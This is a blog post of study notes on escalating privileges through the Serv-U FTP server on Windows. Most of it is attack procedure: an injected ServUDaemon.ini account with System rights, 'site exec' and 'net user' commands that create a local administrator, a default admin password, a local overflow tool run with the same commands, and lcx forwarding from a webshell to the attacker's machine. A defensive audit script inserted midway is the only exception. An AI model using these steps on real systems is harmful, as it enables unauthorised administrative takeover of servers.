Third-party software privilege escalation: Serv-U (study notes, Day 7)

0x00 Serv-U overview

  • Serv-U FTP Server is a widely used FTP server that supports the whole Windows series (3x / 9x / ME / NT / 2K). It can host multiple FTP servers and define login users' permissions, home directory and space size.
  • Serv-U default installation directory: C:\Program Files\rhinosoft.com\serv-U
  • Serv-U password file: ServUDaemon.ini
  • Port number: the default port is 43958
    The port is set in ServUDaemon.ini by LocalSetupPortNo=

0x01 FTP privilege escalation methods

1. With modify permission

2. Without modify permission

3. Serv-U FTP local overflow privilege escalation (applies to 6.0 and earlier versions)

4. Serv-U FTP port forwarding

0x02 With modify permission

The steps are as follows:
1. Check whether Serv-U is installed
Confirm with an nmap port scan.
2. Check whether the configuration file is writable
Typical installation path: C:\Program Files\Serv-U\ServUDaemon.ini
3. Add a Serv-U user
At user4= add a system user:

[USER=quan|1]                    //username
Password=                        //ciphertext of the encrypted user password
HomeDir=c:\ftp\quan              //directory
RelPaths=3
TimeOut=600                      //timeout setting
Maintenance=System               //privilege
Access1=C:\|RWAMELCDP            //accessible directory and permissions
Access2=d:\|RWAMELCDP            //accessible directory and permissions
Access3=e:\|RWAMELCDP            //accessible directory and permissions
SKEYValues=

Password = 2 random characters + md5(2 random characters + 123456)

4. Connect to the target FTP server

ftp <target IP address> <newly added user's password>

5. Use the ftp command quote site exec to add a user and add it to the administrators group

quote site exec net user quan quan123 /add
quote site exec net localgroup administrators quan /add
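
Seen from the defender's side, the account entry in step 3 is what an audit of ServUDaemon.ini should look for. The script below is an added example, not part of the original post: it parses the [USER=...] sections and reports accounts with Maintenance=System, an empty Password value, execute rights, or write access to a drive root. The sample file content and the function name audit_servu_ini are constructed for illustration, and reading the letter E as the execute right is an assumption.

```python
import configparser
import re

# Constructed sample modeled on the [USER=...] entry shown above; not a real file.
SAMPLE_INI = r"""
[USER=alice|1]
Password=xy0123456789ABCDEF0123456789ABCDEF
HomeDir=c:\ftp\alice
Access1=c:\ftp\alice|RWLP
[USER=quan|1]
Password=
HomeDir=c:\ftp\quan
Maintenance=System
Access1=C:\|RWAMELCDP
Access2=d:\ftp\pub|RLP
"""

def audit_servu_ini(text):
    """Return sorted (user, finding) pairs for risky [USER=...] settings."""
    # Default ConfigParser lowercases keys, so lookups are case-insensitive.
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None, strict=False)
    cp.read_string(text)
    findings = []
    for section in cp.sections():
        m = re.match(r"USER=([^|\]]+)", section, re.I)
        if not m:
            continue                      # only account sections are audited
        user, opts = m.group(1), cp[section]
        if opts.get("maintenance", "").strip().lower() == "system":
            findings.append((user, "Maintenance=System"))
        if not opts.get("password", "").strip():
            findings.append((user, "empty Password"))
        for key, value in opts.items():
            if not re.fullmatch(r"access\d+", key):
                continue
            path, _, perms = value.partition("|")
            path, perms, name = path.strip(), perms.strip().upper(), key.capitalize()
            # Assumption: 'E' in the permission string is the execute right.
            if "E" in perms:
                findings.append((user, f"{name} grants execute on {path}"))
            # Write access on a bare drive root exposes the whole volume.
            if "W" in perms and re.fullmatch(r"[A-Za-z]:\\?", path):
                findings.append((user, f"{name} grants write on drive root {path}"))
    return sorted(findings)

if __name__ == "__main__":
    for user, finding in audit_servu_ini(SAMPLE_INI):
        print(f"{user}: {finding}")
```

Running the same check on a schedule and comparing the result with a known-good baseline also shows when an account entry has been added to the file outside the normal administration path.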

0x03 Without modify permission

1. Crack the MD5 hash directly
2. Use the default user name and password
Account: LocalAdministrator, password: #l@$ak#.lk;0@P
Command:
cmd /c net user quan quan123 /add & net localgroup administrators quan /add
3. When the password is not the default
Download ServUAdmin.exe directly.
Open it with WinHex, search for LocalAdministrator (select ANSI characters) and find the password.

0x04 Serv-U FTP local overflow privilege escalation (applies to 6.0 and earlier versions)

The steps are as follows:
1. Use a combined privilege escalation toolkit to generate the Serv-U privilege escalation tool serv_u.exe
2. Upload serv_u.exe to a drive first
For example, drive D.
3. Run

d:\serv_u.exe
d:\serv_u.exe "net user quan quan123 /add"
d:\serv_u.exe "net localgroup administrators quan /add"

Note that the command must be enclosed in quotes.

0x05 Serv-U FTP port forwarding

1. lcx port forwarding
Run the lcx command from the webshell on the target:

lcx -slave yourIP 5000 127.0.0.1 43958

Run on the local machine:

lcx -listen 5000 21

2. Log in with Serv-U on the local machine
Open the local Serv-U and enter 127.0.0.1 as the IP.
Enter LocalAdministrator as the account and #l@$ak#.lk;0@P as the password.


Origin www.cnblogs.com/0nc3/p/12097070.html